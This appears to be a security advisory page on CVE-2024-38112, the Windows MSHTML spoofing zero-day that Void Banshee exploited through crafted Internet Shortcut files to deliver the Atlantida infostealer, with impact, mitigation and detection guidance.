NAVANEM
CVE-2024-38112⚡ exploited in the wild

Windows MSHTML platform, spoofing zero-day (Void Banshee)

Windows MSHTML Platform Spoofing Vulnerability. Successful exploitation requires the attacker to send the user a malicious file, which the user must execute.

Overview

CVE-2024-38112 is a high-severity spoofing vulnerability in the Windows MSHTML platform that was exploited as a zero-day by the threat actor known as Void Banshee from at least January 2024 until Microsoft released a patch on July 9, 2024. The vulnerability allows attackers to craft malicious Internet Shortcut (.url) files that force the legacy MSHTML/Internet Explorer engine to render attacker-controlled content, bypassing modern browser security controls.

Technical Details

The vulnerability exploits how Windows handles Internet Shortcut (.url) files. A specially crafted .url file can specify that its target should be rendered using the legacy IE/MSHTML engine rather than the default modern browser. This behavior persists even on Windows 11 systems with Microsoft Edge configured as the default browser.

When a user executes the malicious .url file, the MSHTML engine renders attacker-controlled HTML or HTA payloads. This bypasses critical security mechanisms including:

  • The modern Edge sandbox environment
  • SmartScreen warnings that would normally block .hta files directly
  • Standard browser security policies

The attack requires user interaction, the victim must execute the malicious .url file, typically delivered through social engineering via spear-phishing campaigns.

Impact

The real-world impact of this vulnerability was significant. Trend Micro attributed active exploitation to the Void Banshee threat actor, who leveraged the vulnerability to deliver the Atlantida infostealer malware. The campaigns specifically targeted financial services and educational institutions.

The .url file format proved particularly effective for attackers because:

  • These files appear as benign Internet shortcuts to users
  • They bypass many email gateway security filters
  • Users are typically trained to avoid .exe and .hta files but not .url files
  • The attack succeeded against targets where direct HTA delivery would have been blocked

The six-month zero-day exposure window (January-July 2024) provided attackers substantial time for exploitation.

Mitigation

  1. Apply the July 2024 cumulative update on all Windows hosts immediately
  2. Block .url file attachments at email gateways, these files rarely have legitimate inbound use cases
  3. Audit email gateway logs for .url attachments delivered during the January-July 2024 exposure window
  4. Review endpoint security policies to restrict execution of Internet Shortcut files from untrusted sources

Detection

Organizations should sweep endpoints for indicators of compromise associated with the Atlantida infostealer:

  • Suspicious artifacts under %LOCALAPPDATA%
  • Scheduled tasks named after Microsoft products that are not legitimate Microsoft tasks
  • Review Trend Micro's published IOCs from their detailed write-up on the Void Banshee campaign